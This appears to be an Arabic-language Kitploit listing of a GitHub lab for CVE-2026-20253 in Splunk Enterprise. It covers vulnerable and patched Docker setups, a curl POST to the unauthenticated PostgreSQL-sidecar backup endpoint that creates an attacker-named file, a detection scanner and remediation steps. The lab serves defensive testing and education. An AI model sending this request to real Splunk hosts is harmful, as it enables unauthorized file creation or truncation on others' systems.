Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20253 — POC لـ CVE-2026-20253 | Kitploit
أدوات/GitHubGitHub/pssec-io/cve-2026-20253
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubpssec-io/cve-2026-20253

CVE-2026-20253

POC لـ CVE-2026-20253

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20253 — مختبر RCE قبل المصادقة في Splunk Enterprise

إنشاء واقتطاع ملفات عشوائية دون مصادقة عبر الخدمة المصاحبة PostgreSQL
CVSS 9.8 · حرجة · CWE-306 · استغلال نشط (CISA KEV)


⚠️ إخلاء مسؤولية

هذا المستودع مخصص حصرياً للأغراض التعليمية وأبحاث الأمن المصرّح بها.
يجب إجراء جميع الاختبارات ضد بنية تحتية تملكها أو لديك إذن كتابي صريح لاختبارها.
لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام التقنيات أو الأدوات الموضحة هنا.
لا تقم أبداً بتشغيل هذا ضد أنظمة الإنتاج أو البيئات التي لا تملكها.


نظرة عامة

يؤثر CVE-2026-20253 على إصدارات Splunk Enterprise الأقل من 10.2.4 و10.0.7.
تكشف الخدمة المصاحبة PostgreSQL المضمنة مع Splunk عن نقطتي نهاية HTTP داخليتين:

root@kitploit:~
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore

تفتقر كلتا نقطتي النهاية إلى أي فحص للمصادقة (CWE-306)، مما يعني أن أي مهاجم يمكنه الوصول عبر الشبكة يمكنه استدعاءهما دون بيانات اعتماد. ومن خلال توفير معامل backupFile يتحكم فيه المهاجم، يمكن لمستخدم غير مصادَق إنشاء أو اقتطاع ملفات عشوائية على نظام ملفات مضيف Splunk — وهي أولية استغلال (primitive) تمكن الباحثون من ربطها في سلسلة للوصول إلى تنفيذ كامل للأوامر عن بُعد قبل المصادقة.


هيكل المستودع

root@kitploit:~
.
├── Dockerfile                  # Vulnerable image  (splunk 10.2.3)
├── docker-compose.yml          # Vulnerable container on port 8000
├── patched.Dockerfile          # Patched image     (splunk 10.2.4)
├── patched-docker-compose.yml  # Patched container on port 8001
└── instructions                # Quick command reference

المتطلبات الأساسية

  • Docker + Docker Compose v2
  • ~6 GB مساحة قرص فارغة (صورة Splunk كبيرة الحجم)
  • Kali Linux أو أي مضيف Linux يتوفر عليه curl

الاستخدام

تشغيل المثيل القابل للاستغلال (المنفذ 8000)

root@kitploit:~
docker compose -f docker-compose.yml up -d --build

انتظر حوالي 90 ثانية حتى يكتمل تشغيل Splunk بالكامل. تابع التقدم باستخدام:

root@kitploit:~
docker compose -f docker-compose.yml logs -f
# Ready when you see: "Ansible playbook complete"

واجهة ويب Splunk → http://localhost:8000
بيانات الاعتماد: admin / changeme


تشغيل المثيل المُصحَّح (المنفذ 8001)

root@kitploit:~
docker compose -f patched-docker-compose.yml up -d --build

واجهة ويب Splunk → http://localhost:8001
بيانات الاعتماد: admin / changeme

يمكن تشغيل الحاويتين جنباً إلى جنب — المنافذ متباعدة لتجنب التعارضات.


الاختبار

اختبار المثيل القابل للاستغلال → توقع HTTP 400

root@kitploit:~
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

المتوقع: 400 — نقطة النهاية موجودة، ولم يتم فرض أي مصادقة، وتمت معالجة الطلب.

تحقق من إنشاء الملف داخل الحاوية:

root@kitploit:~
docker exec splunk-cve-2026-20253 ls -la /tmp/poc

اختبار المثيل المُصحَّح → توقع HTTP 401

root@kitploit:~
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

المتوقع: 401 — تم الآن فرض المصادقة، وتم رفض الطلب.


مرجع رموز الاستجابة

HTTP Statusالمعنى

اختياري: ماسح watchTowr

نشر فريق watchTowr Labs سكربت كشف يعمل على أتمتة الفحص أعلاه:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000

إيقاف المختبر

root@kitploit:~
# Stop vulnerable
docker compose -f docker-compose.yml down

# Stop patched
docker compose -f patched-docker-compose.yml down

المعالجة

حدّث فوراً إلى إصدار مُصحَّح:

الفرعالإصدار المُصحَّح
10.2.x10.2.4
10.0.x10.0.7

إذا لم تتمكن من تطبيق التصحيح فوراً، فعطّل الخدمة المصاحبة PostgreSQL بإضافة ما يلي إلى server.conf وأعد تشغيل Splunk:

root@kitploit:~
[postgres]
disabled = true

⚠️ لا تعطّل الخدمة المصاحبة إذا كنت تشغّل Edge Processor أو خطوط بيانات SPL2 — فهي مطلوبة لهذه الميزات.


المراجع

  • 🔴 نشرة Splunk الرسمية — SVD-2026-0603
  • 🔬 أبحاث وأداة كشف watchTowr Labs — github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • 📋 إدخال CISA KEV — cisa.gov/known-exploited-vulnerabilities-catalog
  • 📰 مقال The Hacker News — ثغرة حرجة في Splunk Enterprise تتيح للمهاجمين تشغيل الكود دون مصادقة

إخلاء مسؤولية قانوني

بيئة المختبر هذه مقدمة لأبحاث الأمن الدفاعي والتعليم فقط.
الوصول غير المصرّح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون الاحتيال وإساءة استخدام الحاسوب (CFAA)، وقانون إساءة استخدام الحاسوب في المملكة المتحدة، والتشريعات المماثلة حول العالم.
استخدم بمسؤولية.

تنزيل الأداة
الخاصيةالتفاصيل
CVECVE-2026-20253
درجة CVSS9.8 (حرجة)
CWECWE-306 — غياب المصادقة لوظيفة حرجة
المتأثرSplunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4
تم التصحيح في10.0.7, 10.2.4
CISA KEVأُضيف في 18 يونيو 2026
400قابل للاستغلال — تم الوصول إلى نقطة النهاية، لا يوجد فحص مصادقة
401مُصحَّح — تم فرض المصادقة
404الخدمة المصاحبة غير موجودة / مسار خاطئ
000الحاوية ليست جاهزة بعد